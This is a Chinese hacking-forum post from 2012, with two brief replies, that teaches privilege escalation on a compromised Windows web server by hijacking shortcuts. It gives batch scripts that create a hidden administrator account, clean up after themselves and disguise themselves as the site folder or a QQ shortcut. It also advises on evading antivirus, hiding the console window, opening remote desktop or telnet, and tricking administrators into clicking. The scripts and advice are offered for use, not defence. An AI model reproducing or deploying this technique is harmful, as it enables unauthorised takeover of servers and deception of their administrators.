切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
160 smb会话劫持 3[复制链接]
发表于 2012-10-1 23:32:44 | 显示全部楼层 |!read_mode!

漏洞利用,需要发挥激情,需要非主流脑惨的思维,
举例子,还记得快捷方式劫持漏洞码?

参考:

另类提权之利用快捷方式劫持提权
新建一个temp.bat,内容
@echo off
net user enterer 123456 /add & net localgroup administrators enterer /add
start c:\wwwroot
attrib “c:\wwwroot” -h -s
del c:\php\temp.bat
del c:\ wwwroot.lnk
exit
意思是在运行一个快捷方式的时候添加账号并且打开网站的文件夹,最后把文件夹的隐藏属性去掉并且删除自己。
这个是默认运行在C:\php里的temp.bat 打开的网站文件夹是c:\wwwroot可以根据现实进行修改
点击temp.bat的右键选择建立快捷方式,把快捷方式放在网站一样的文件夹或者前一个文件夹。当你主动提权失败的时候就可以用这个方法了,可以挂黑页或者发email给管理员。管理员登陆服务器的时候,访问我们的快捷方式(他以为是网站的目录),此时就可以提权成功了。
这里给的是一种思路,不要问怎么把网站文件夹隐藏,怎么去掉快捷方式的箭头等等。因为用快捷方式会闪现一个CMD窗口,可以考虑把快捷方式改成exe文件(就不会有箭头,但是有后缀),把运行的bat改成exe或者vbs等,使CMD窗口不显现(具体可以用bat2exe等工具)。
或者你有权限修改桌面快捷方式,那就不担心箭头问题了。把管理员可能经常用的程序,如QQ等快捷方式修改成指向可以运行提权命令并可以运行QQ的bat文件。例如
@echo off
net user enterer 123456 /add & net localgroup administrators enterer /add
start c:\qq\qq.exe
exit
这个也算变相的捆绑了,不过绝对是免杀的。命令可以是加账号或者开3389,运行telnet服务等。怎么诱导管理员点击就是大家的问题了。
文章都是字可能大家不太习惯,希望大家有耐心看完,虽然这样提权的机会比较小,但是作为一种思路吧,呵呵

我们可以多个漏洞结合使用 例如:


/shiping/lnk.mp4



操千曲而后晓声,观千剑而后识器。
发表于 2014-7-17 15:59:37 | 显示全部楼层
的确不错 受教了!

发表于 2014-8-18 19:53:31 | 显示全部楼层

代码区

GMT+8, 2020-9-21 08:34

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部